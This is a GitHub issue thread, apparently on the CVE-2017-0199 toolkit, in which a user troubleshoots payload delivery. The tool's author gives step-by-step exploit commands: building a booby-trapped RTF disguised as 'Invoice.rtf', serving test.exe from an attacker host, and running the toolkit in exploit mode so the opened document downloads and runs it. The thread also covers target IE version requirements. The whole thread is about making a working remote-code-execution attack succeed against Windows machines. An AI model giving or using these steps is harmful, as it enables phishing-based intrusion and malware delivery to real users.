Request for help please #58
Comments
|
I think you missed to specify port in -e argument, it should be something
like as http://192.168.1.100:443/test.exe because tool is running on 443
and not on 80
On 6 Dec 2017 1:48 p.m., "ITLerner" <notifications@github.com> wrote:
I am using kali linux2. I generated rtf file using command python
cve-2017-0199_toolkit.py -M gen -t RTF -w test.rtf -u
http://192.168.1.100:443
Then I use command python cve-2017-0199_toolkit.py -M exp -p 443 -e
http://192.168.1.100/test.exe for running exploitation mode... When i run
test.rtf on a windows machine I got "Received GET method from
192.168.1.108" twice .. Issue is that test.exe is NOT delivering there on
the windows machine. Please help me. Thanks
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub
<#58>, or mute the thread
<https://github.com/notifications/unsubscribe-auth/AIhKLbnVVitvtAnYO6LlC0GQAdxDyA6Hks5s9mLggaJpZM4Q3ocX>
.
|
|
Dear bhdresh i am extremely thankful for your reply. I changed -e argument same as you mentioned please. I have still same issue . Receiving "Received GET method from 192.168.1.108" twice (in two lines) . I am confused on HTA .. I think HTA should delivered payload But in my case i dont have added this. Please help me how can i add hta.. |
|
I see, let's start with basic setup then,
Step 1) Generate RTF using below command,
python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u
http://192.168.1.100/logo.doc
Step 2) Copy test.exe in to /tmp
Step 3) Start toolkit in exploit mode using following command,
python cve-2017-0199_toolkit.py -M exp -t RTF -e
http://192.168.1.100/test.exe -l /tmp/test.exe
Step 4) Open RTF file on target.
Note: it was pointed out in metasploit thread that Internet Explorer
version should be at least IE10 (rapid7/metasploit-framework#8220
<rapid7/metasploit-framework#8220>).
Hope this will help :)
On 6 Dec 2017 8:26 p.m., "ITLerner" <notifications@github.com> wrote:
Dear bhdresh i am extremely thankful for your reply. I changed -e argument
same as you mentioned please. I have still same issue . Receiving "Received
GET method from 192.168.1.108" twice (in two lines) . I am confused on HTA
.. I think HTA should delivered payload But in my case i dont have added
this. Please help me how can i add hta..
—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub
<#58 (comment)>,
or mute the thread
<https://github.com/notifications/unsubscribe-auth/AIhKLRWJU7viiHLSHjt3nY0X4meOZi1Jks5s9sBNgaJpZM4Q3ocX>
.
|
|
Thanks again for your time and reply. I did the same as you mentioned. This time I didn't find anything when Start toolkit in exploit mode. even no "Received GET method from..." I am unable to understand what is the logo.doc in -u argument ... ? |
|
Are you sure the target is vulnerable and IE version is 10+? Regarding your query about arguments, below image from README.md should be able to help you understand the flow and role of arguments being used, https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v3.0-beta-2.0/Scenario1.jpg Thanks. |
|
yes, i am 100 % sure Please. I am testing it on windows 8.1, IE 11. When I use -u command without logo.doc (mentioned at the end of the command) then I received ( "Received GET method from...") which indicates system Vulnerability. but my payload is not delivering ... If I used -u arrangement with logo.doc then i didn't receive any response. Please explain what is logo.doc?? hope you will understand my point and help me. Regards |
|
What is logo.doc ? Can this be used on remote server ? or just local ? |
I am using kali linux2. I generated rtf file using command python cve-2017-0199_toolkit.py -M gen -t RTF -w test.rtf -u http://192.168.1.100:443
Then I use command python cve-2017-0199_toolkit.py -M exp -p 443 -e http://192.168.1.100/test.exe for running exploitation mode... When i run test.rtf on a windows machine I got "Received GET method from 192.168.1.108" twice .. Issue is that test.exe is NOT delivering there on the windows machine. Please help me. Thanks
The text was updated successfully, but these errors were encountered: